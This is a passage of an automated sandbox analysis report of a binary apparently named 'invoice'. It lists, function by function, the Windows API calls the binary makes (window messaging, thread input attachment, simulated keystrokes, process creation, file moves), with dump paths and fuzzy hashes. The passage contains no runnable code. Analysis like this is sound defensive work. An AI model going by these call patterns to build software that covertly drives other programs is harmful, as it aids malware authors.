                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FD9300
                        • GetDlgCtrlID.USER32(?), ref: 00FD9309
                        • GetParent.USER32(?), ref: 00FD9325
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FD9328
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1536045017-1403004172
                        • Opcode ID: 2468c899f3b389e910c3e054737216c152cb2360bd784fb221241cb5caa8348a
                        • Instruction ID: 9ab93eda5dd5588d3be9a2df95fc518496c146a107acfb1cc25f5efd65d093eb
                        • Opcode Fuzzy Hash: 2468c899f3b389e910c3e054737216c152cb2360bd784fb221241cb5caa8348a
                        • Instruction Fuzzy Hash: 94210674D40205BBCF14ABA1CC85EFEBB79EF49310F14021AF56197291DF799815EB20
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FD93BF
                        • GetDlgCtrlID.USER32 ref: 00FD93CA
                        • GetParent.USER32 ref: 00FD93E6
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FD93E9
                        • GetDlgCtrlID.USER32(?), ref: 00FD93F2
                        • GetParent.USER32(?), ref: 00FD940E
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FD9411
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1536045017-1403004172
                        • Opcode ID: 0872aecf43166bc5f710f8179a4b7d5fc4922664e87d2fb153a4d1ed65958424
                        • Instruction ID: 27b976e998b19ce91b090f3835c98b143ca1e50a13a3e98ae183d30def0664f3
                        • Opcode Fuzzy Hash: 0872aecf43166bc5f710f8179a4b7d5fc4922664e87d2fb153a4d1ed65958424
                        • Instruction Fuzzy Hash: F8210375A00204BBCF10EBA1CC85EFEBBB9EF49300F144116F95197296DF79881AEB20
                        APIs
                        • GetParent.USER32 ref: 00FD9431
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00FD9446
                        • _wcscmp.LIBCMT ref: 00FD9458
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FD94D3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassMessageNameParentSend_wcscmp
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 1704125052-3381328864
                        • Opcode ID: 128077fc6e67f35ec8e3e13610405e7c60c8e2f56051577116e586b4697bf9a2
                        • Instruction ID: e69eff3762294ac2a4565a6c639bfa0b88093ca3231077e9d6537c4a6e004ce0
                        • Opcode Fuzzy Hash: 128077fc6e67f35ec8e3e13610405e7c60c8e2f56051577116e586b4697bf9a2
                        • Instruction Fuzzy Hash: D2115CB764C307BAF6216661AC07DA6339D8B07334F20C21BF904E51A2FED668037640
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00FF89EC
                        • CoInitialize.OLE32(00000000), ref: 00FF8A19
                        • CoUninitialize.OLE32 ref: 00FF8A23
                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00FF8B23
                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FF8C50
                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01012C0C), ref: 00FF8C84
                        • CoGetObject.OLE32(?,00000000,01012C0C,?), ref: 00FF8CA7
                        • SetErrorMode.KERNEL32(00000000), ref: 00FF8CBA
                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FF8D3A
                        • VariantClear.OLEAUT32(?), ref: 00FF8D4A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                        • String ID:
                        • API String ID: 2395222682-0
                        • Opcode ID: 3ea6cc10cab1eca8491b38b46fd080bbfa0cd7b5e206a2162ec4c256383e7fa7
                        • Instruction ID: 47c8054a4f3c6e74016792c705821d8b87db8ffb626db92b2d9c964856b061c8
                        • Opcode Fuzzy Hash: 3ea6cc10cab1eca8491b38b46fd080bbfa0cd7b5e206a2162ec4c256383e7fa7
                        • Instruction Fuzzy Hash: F6C137B1608309AFC700EF64C88496AB7E9FF88788F04491DF6859B261DB75ED06DB52
                        APIs
                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00FE7B15
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ArraySafeVartype
                        • String ID:
                        • API String ID: 1725837607-0
                        • Opcode ID: 193825d4a72f4812c2c5b0973ca6ddbe9088fb4f35f868622aa2dd162e02617f
                        • Instruction ID: a5048ba5f90780f77721e5d2963e7cd4e857bfc78b92846c74a5e2308ac78687
                        • Opcode Fuzzy Hash: 193825d4a72f4812c2c5b0973ca6ddbe9088fb4f35f868622aa2dd162e02617f
                        • Instruction Fuzzy Hash: 9DB1B271D0434A9FDB21EF95D884BBEB7B5FF48320F244069E900EB251D738A941EB90
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00FE1521
                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE1535
                        • GetWindowThreadProcessId.USER32(00000000), ref: 00FE153C
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE154B
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FE155D
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE1576
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE1588
                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE15CD
                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE15E2
                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE15ED
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        • Opcode ID: ad23a69ddafd25a1d4a83b47bc7889ab4dd3d12ab3cd0b15449ed58c9845b899
                        • Instruction ID: ea14cf2fc03e5df197c412c599e52819b213a779c6544133eb7136fdc4187555
                        • Opcode Fuzzy Hash: ad23a69ddafd25a1d4a83b47bc7889ab4dd3d12ab3cd0b15449ed58c9845b899
                        • Instruction Fuzzy Hash: 7231F7B5900304BFDB31DF66DE84FAA37A9FB89321F544015F885C6185EB7A9D40AB50
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F8FC06
                        • OleUninitialize.OLE32(?,00000000), ref: 00F8FCA5
                        • UnregisterHotKey.USER32(?), ref: 00F8FDFC
                        • DestroyWindow.USER32(?), ref: 00FC492F
                        • FreeLibrary.KERNEL32(?), ref: 00FC4994
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FC49C1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 469580280-3243417748
                        • Opcode ID: 108d959e4fa763397105737b9495397031e3b9b53d236af3f8975bb42def63f7
                        • Instruction ID: bec08546d848f5e98b3979ab0c59ce291087476cd5e97f9d7cfd578d0b402dfe
                        • Opcode Fuzzy Hash: 108d959e4fa763397105737b9495397031e3b9b53d236af3f8975bb42def63f7
                        • Instruction Fuzzy Hash: DAA16E31B012238FCB29EF14C9A5F69F764BF05710F5442ADE90AAB252DB34AD16EF50
                        APIs
                        • EnumChildWindows.USER32(?,00FDA844), ref: 00FDA782
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ChildEnumWindows
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 3555792229-1603158881
                        • Opcode ID: 63c50f8e95033f2599d3dd22c3a4ece2df49160613f37bb13516cccdd122989f
                        • Instruction ID: faf33c1fad94dc429dc4129aeb6b2acb9c2c634db0a9ded9255cc3e195b701cf
                        • Opcode Fuzzy Hash: 63c50f8e95033f2599d3dd22c3a4ece2df49160613f37bb13516cccdd122989f
                        • Instruction Fuzzy Hash: B591B471A00605EBCB18EF70C881BEDFB76BF05314F18821AE859A7241DF34A959EB95
                        APIs
                        • SetWindowLongW.USER32(?,000000EB), ref: 00F82EAE
                          • Part of subcall function 00F81DB3: GetClientRect.USER32(?,?), ref: 00F81DDC
                          • Part of subcall function 00F81DB3: GetWindowRect.USER32(?,?), ref: 00F81E1D
                          • Part of subcall function 00F81DB3: ScreenToClient.USER32(?,?), ref: 00F81E45
                        • GetDC.USER32 ref: 00FBCEB2
                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FBCEC5
                        • SelectObject.GDI32(00000000,00000000), ref: 00FBCED3
                        • SelectObject.GDI32(00000000,00000000), ref: 00FBCEE8
                        • ReleaseDC.USER32(?,00000000), ref: 00FBCEF0
                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FBCF7B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                        • String ID: U
                        • API String ID: 4009187628-3372436214
                        • Opcode ID: 9f7eedaf4c3632df4d1a610e142d793e2b0e19befb0396a4faf094af2e2fea95
                        • Instruction ID: e38ecd1b4d94eefcb04466bd0aecf0280dac7550a1a468eefc7f57dfca7008a1
                        • Opcode Fuzzy Hash: 9f7eedaf4c3632df4d1a610e142d793e2b0e19befb0396a4faf094af2e2fea95
                        • Instruction Fuzzy Hash: 58719F31900205DFCF21DF65C884AFA7BB6FF49360F1442AAED955A296C7359841EFA0
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0100F910), ref: 00FF8E3D
                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0100F910), ref: 00FF8E71
                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00FF8FEB
                        • SysFreeString.OLEAUT32(?), ref: 00FF9015
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                        • String ID:
                        • API String ID: 560350794-0
                        • Opcode ID: 636711e0b02505d721a1abda64624807aa5f1675f5b8fc5244bd1a16e2a30c34
                        • Instruction ID: 56cae7308f575c9bcee7048208b3922b9ad3cbd0c23aedfb6779baa1fba2c460
                        • Opcode Fuzzy Hash: 636711e0b02505d721a1abda64624807aa5f1675f5b8fc5244bd1a16e2a30c34
                        • Instruction Fuzzy Hash: 70F13D71A00109EFCB14DF94C888EBEB7B9FF89354F148099F515AB2A0DB71AE46DB50
                        APIs
                        • _memset.LIBCMT ref: 00FFF7C9
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF95C
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF980
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF9C0
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF9E2
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FFFB5E
                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00FFFB90
                        • CloseHandle.KERNEL32(?), ref: 00FFFBBF
                        • CloseHandle.KERNEL32(?), ref: 00FFFC36
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                        • String ID:
                        • API String ID: 4090791747-0
                        • Opcode ID: ed1af65db890abb616212eb9f0f774b2c7c7662ec531b5c16c4aa167d376a9c8
                        • Instruction ID: bc982d97d221c81cd153328d8e791f2cf1ae6216b54c348a8401427982eac9c5
                        • Opcode Fuzzy Hash: ed1af65db890abb616212eb9f0f774b2c7c7662ec531b5c16c4aa167d376a9c8
                        • Instruction Fuzzy Hash: C4E1D5316043059FC724EF24C881B7ABBE0AF85364F18846DF9999B2B2DB75DC05EB52
                        APIs
                          • Part of subcall function 00FE46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FE36DB,?), ref: 00FE46CC
                          • Part of subcall function 00FE46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FE36DB,?), ref: 00FE46E5
                          • Part of subcall function 00FE4AD8: GetFileAttributesW.KERNEL32(?,00FE374F), ref: 00FE4AD9
                        • lstrcmpiW.KERNEL32(?,?), ref: 00FE4DE7
                        • _wcscmp.LIBCMT ref: 00FE4E01
                        • MoveFileW.KERNEL32(?,?), ref: 00FE4E1C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                        • String ID:
                        • API String ID: 793581249-0
                        • Opcode ID: fdc835a516e495ed229c262db7e9096ab0d4487159a7ed3a3078ed89fca0a910
                        • Instruction ID: 1f2faab7e5686a4dd457a3f34c567cb1b010bec36af04a49c4d88b2a11195a89
                        • Opcode Fuzzy Hash: fdc835a516e495ed229c262db7e9096ab0d4487159a7ed3a3078ed89fca0a910
                        • Instruction Fuzzy Hash: 225173B24083859BC724EBA5DC819DFB3ECAF85710F10092EB285D3151EF38F6889766
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 01008731
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        • Opcode ID: e0afafa54a1eba925c5f7b9b0b1a58d68592565d3d0cf78757675878ce396320
                        • Instruction ID: 154b3facb28d1ecedba252568716dbb42a60c30e44424faac6d308accd841948
                        • Opcode Fuzzy Hash: e0afafa54a1eba925c5f7b9b0b1a58d68592565d3d0cf78757675878ce396320
                        • Instruction Fuzzy Hash: B351A170900205BBFB729A29DC85B9D3FA8BB09320F108557FAD5E61E1CB75EA909B50
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FBC477
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FBC499
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FBC4B1
                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FBC4CF
                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FBC4F0
                        • DestroyIcon.USER32(00000000), ref: 00FBC4FF
                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FBC51C
                        • DestroyIcon.USER32(?), ref: 00FBC52B
                          • Part of subcall function 0100A4E1: DeleteObject.GDI32(00000000), ref: 0100A51A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                        • String ID:
                        • API String ID: 2819616528-0
                        • Opcode ID: 5fd079807910538bd41717f67876bb9c861b16e4608f041cba73cab50c3c32ba
                        • Instruction ID: 54f25578b809b70a374e3538943e663fc4b190634c7051968e0e650ad0654e0c
                        • Opcode Fuzzy Hash: 5fd079807910538bd41717f67876bb9c861b16e4608f041cba73cab50c3c32ba
                        • Instruction Fuzzy Hash: E0515975A00209EFDB20EF25DC85FAA37A5FB58720F100528F942E7290DB75ED81EB90
                        APIs
                          • Part of subcall function 00FDAC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDAC57
                          • Part of subcall function 00FDAC37: GetCurrentThreadId.KERNEL32 ref: 00FDAC5E
                          • Part of subcall function 00FDAC37: AttachThreadInput.USER32(00000000,?,00FD9945,?,00000001), ref: 00FDAC65
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD9950
                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FD996D
                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FD9970
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD9979
                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FD9997
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FD999A
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD99A3
                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FD99BA
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FD99BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                        • String ID:
                        • API String ID: 2014098862-0
                        • Opcode ID: 0002fc835e0ce0ef0cbb3d0c088d65907ba3c08d6cf2f77b161cb68693eddb3b
                        • Instruction ID: aa3a5abe789eac01397c53ade94904c73c3ac675d1a6aa216440cf36714aabed
                        • Opcode Fuzzy Hash: 0002fc835e0ce0ef0cbb3d0c088d65907ba3c08d6cf2f77b161cb68693eddb3b
                        • Instruction Fuzzy Hash: 2D11E171650618BFF6216B70CC89FAA7B2DEB4C765F10041AF284AB194CAF75C10EBA4
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FD8864,00000B00,?,?), ref: 00FD8BEC
                        • HeapAlloc.KERNEL32(00000000,?,00FD8864,00000B00,?,?), ref: 00FD8BF3
                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FD8864,00000B00,?,?), ref: 00FD8C08
                        • GetCurrentProcess.KERNEL32(?,00000000,?,00FD8864,00000B00,?,?), ref: 00FD8C10
                        • DuplicateHandle.KERNEL32(00000000,?,00FD8864,00000B00,?,?), ref: 00FD8C13
                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FD8864,00000B00,?,?), ref: 00FD8C23
                        • GetCurrentProcess.KERNEL32(00FD8864,00000000,?,00FD8864,00000B00,?,?), ref: 00FD8C2B
                        • DuplicateHandle.KERNEL32(00000000,?,00FD8864,00000B00,?,?), ref: 00FD8C2E
                        • CreateThread.KERNEL32(00000000,00000000,00FD8C54,00000000,00000000,00000000), ref: 00FD8C48
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
